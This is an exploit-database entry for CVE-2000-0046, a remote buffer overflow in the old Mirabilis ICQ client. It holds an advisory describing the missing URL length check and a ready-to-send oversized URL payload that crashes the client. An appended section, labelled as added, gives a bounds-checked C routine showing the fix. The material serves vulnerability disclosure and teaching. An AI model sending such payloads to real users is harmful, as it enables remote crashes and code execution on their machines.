Exploit Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow

EDB-ID: 19724
EDB verification: Passed
Author: DREW COPLEY
Vulnerability type: REMOTE
Platform: WINDOWS
CVE: CVE-2000-0046
Publication date: 2000-01-12
Code:
source: https://www.securityfocus.com/bid/929/info

ICQ is an individual to individual chat network which has clients installed on millions of computers around the world. It is, by far, the most widely used and is vulnerable to a remote buffer overflow. When the Mirabilis ICQ client parses a URL received from another user _inside of a message_, it does not perform bounds checking on the length of the URL. Because of this, it is possible to overwrite the EIP ("instruction pointer", or return address, that was pushed onto the stack when the offending function was first called) and execute arbitrary and possibly malicious code stuffed inside the oversized URL on the target host once the URL is clicked on.

Sending the following URL (with no line breaks) in a regular message to a user will cause their ICQ to crash (just a basic proof of concept, no real malicious exploit code included here) if they click on it:

http://www.yahoo.com/sites.asp?^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^ Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^à ^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã!!!!·P !^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã
 
Source
www.exploit-db.com
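
The missing length check described in the advisory, shown as a bounds-checked URL extraction routine in C. This is an added example, not code from ICQ, the advisory or exploit-db; `extract_url`, the `URL_*` result codes and the 256-byte `URL_MAX` limit are assumptions made for illustration.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define URL_MAX 256  /* assumed destination size, not taken from ICQ */

/* Result codes (hypothetical names). */
enum { URL_OK = 0, URL_NONE = -1, URL_TOO_LONG = -2, URL_BAD_BYTE = -3 };

/*
 * Copy the first http:// URL found in msg into out (capacity out_cap).
 * The URL ends at whitespace or at the end of the string.
 * The length is measured before anything is copied, so an oversized URL
 * is rejected outright instead of being written past the destination,
 * which is what an unchecked strcpy() into a stack buffer would do.
 */
int extract_url(const char *msg, char *out, size_t out_cap)
{
    const char *start, *p;
    size_t len;

    if (msg == NULL || out == NULL || out_cap == 0)
        return URL_NONE;
    out[0] = '\0';                       /* never leave stale data behind */

    start = strstr(msg, "http://");
    if (start == NULL)
        return URL_NONE;

    for (p = start; *p != '\0' && !isspace((unsigned char)*p); p++) {
        /* Reject control and non-ASCII bytes; a valid URL is printable ASCII. */
        if ((unsigned char)*p < 0x21 || (unsigned char)*p > 0x7e)
            return URL_BAD_BYTE;
    }

    len = (size_t)(p - start);
    if (len >= out_cap)                  /* keep room for the terminating NUL */
        return URL_TOO_LONG;

    memcpy(out, start, len);
    out[len] = '\0';
    return URL_OK;
}
```

Callers should treat `URL_TOO_LONG` and `URL_BAD_BYTE` as a reason to display the message text without a clickable link, rather than truncating the URL and passing it on.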
